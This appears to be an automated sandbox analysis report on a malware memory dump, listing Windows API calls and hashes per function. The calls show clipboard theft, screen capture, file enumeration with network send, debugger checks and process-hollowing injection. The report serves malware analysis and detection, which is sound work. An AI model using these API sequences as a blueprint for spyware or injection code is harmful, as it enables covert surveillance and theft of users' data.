__EH_prolog.LIBCMT ref: 00408811
FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
__CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
Opcode Fuzzy Hash: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

XPG, xrefs: 00407877
XPG, xrefs: 0040793A

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: XPG$XPG
API String ID: 4113138495-1962359302
Opcode ID: 11350949d9fcc842171cf69227dc5de75b050bd169a1425ba824deee8cc34b80
Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
Opcode Fuzzy Hash: 11350949d9fcc842171cf69227dc5de75b050bd169a1425ba824deee8cc34b80
Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B

Uniqueness

Uniqueness Score: -1.00%

Function 00451CD8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB

Strings

sJD, xrefs: 00451DD1, 00451E19, 00451EC1

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
String ID: sJD
API String ID: 1661935332-3536923933
Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769

Uniqueness

Uniqueness Score: -1.00%

Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0043BC1A
SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC24
UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48

Uniqueness

Uniqueness Score: -1.00%

Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00A19770), ref: 00433849
CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 0040B711
GetClipboardData.USER32 ref: 0040B71D
CloseClipboard.USER32 ref: 0040B725

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0044EA0C

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54

Uniqueness

Uniqueness Score: -1.00%

Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D

Strings

lJD, xrefs: 00451FA0

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: lJD
API String ID: 1084509184-3316369744
Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082

Strings

lJD, xrefs: 0045203B

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: lJD
API String ID: 1084509184-3316369744
Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604

Uniqueness

Uniqueness Score: -1.00%

Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940

Strings

GetLocaleInfoEx, xrefs: 00448908

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
Opcode Fuzzy Hash: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E

Uniqueness

Uniqueness Score: -1.00%

Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
HeapFree.KERNEL32(00000000), ref: 004120EE

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
Opcode Fuzzy Hash: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00434C52 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434C6B

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698

Uniqueness

Uniqueness Score: -1.00%

Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897

EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09

Uniqueness

Uniqueness Score: -1.00%

Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754

Uniqueness

Uniqueness Score: -1.00%

Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

Uniqueness

Uniqueness Score: -1.00%

Function 00418E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
CreateCompatibleDC.GDI32(00000000), ref: 00418E9D

Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355

CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
DeleteDC.GDI32(00000000), ref: 00418F2A
DeleteDC.GDI32(00000000), ref: 00418F2D
DeleteObject.GDI32(00000000), ref: 00418F30
SelectObject.GDI32(00000000,00000000), ref: 00418F51
DeleteDC.GDI32(00000000), ref: 00418F62
DeleteDC.GDI32(00000000), ref: 00418F65
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
GetIconInfo.USER32 ref: 00418FBD
DeleteObject.GDI32(?), ref: 00418FEC
DeleteObject.GDI32(?), ref: 00418FF9
DrawIcon.USER32(00000000,?,?,?), ref: 00419006
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
DeleteDC.GDI32(?), ref: 0041917C
DeleteDC.GDI32(00000000), ref: 0041917F
DeleteObject.GDI32(00000000), ref: 00419182
GlobalFree.KERNEL32(?), ref: 0041918D
DeleteObject.GDI32(00000000), ref: 00419241
GlobalFree.KERNEL32(?), ref: 00419248
DeleteDC.GDI32(?), ref: 00419258
DeleteDC.GDI32(00000000), ref: 00419263

Strings

DISPLAY, xrefs: 00418E89

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
String ID: DISPLAY
API String ID: 479521175-865373369
Opcode ID: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
Opcode Fuzzy Hash: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
GetProcAddress.KERNEL32(00000000), ref: 00418139
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
GetProcAddress.KERNEL32(00000000), ref: 0041814D
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
GetProcAddress.KERNEL32(00000000), ref: 00418161
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
GetProcAddress.KERNEL32(00000000), ref: 00418175
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
GetThreadContext.KERNEL32(?,00000000), ref: 00418245
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
TerminateProcess.KERNEL32(?,00000000), ref: 00418301
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
SetThreadContext.KERNEL32(?,00000000), ref: 00418428
ResumeThread.KERNEL32(?), ref: 00418435
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
GetCurrentProcess.KERNEL32(?), ref: 00418457
TerminateProcess.KERNEL32(?,00000000), ref: 00418472
GetLastError.KERNEL32 ref: 0041847A

Strings

ZwMapViewOfSection, xrefs: 0041813B
ZwUnmapViewOfSection, xrefs: 0041814F
ntdll, xrefs: 00418121, 00418140, 00418154, 00418168
ZwClose, xrefs: 00418163
ZwCreateSection, xrefs: 0041811C

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
API String ID: 4188446516-3035715614
Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON

Download Yara Rule

APIs

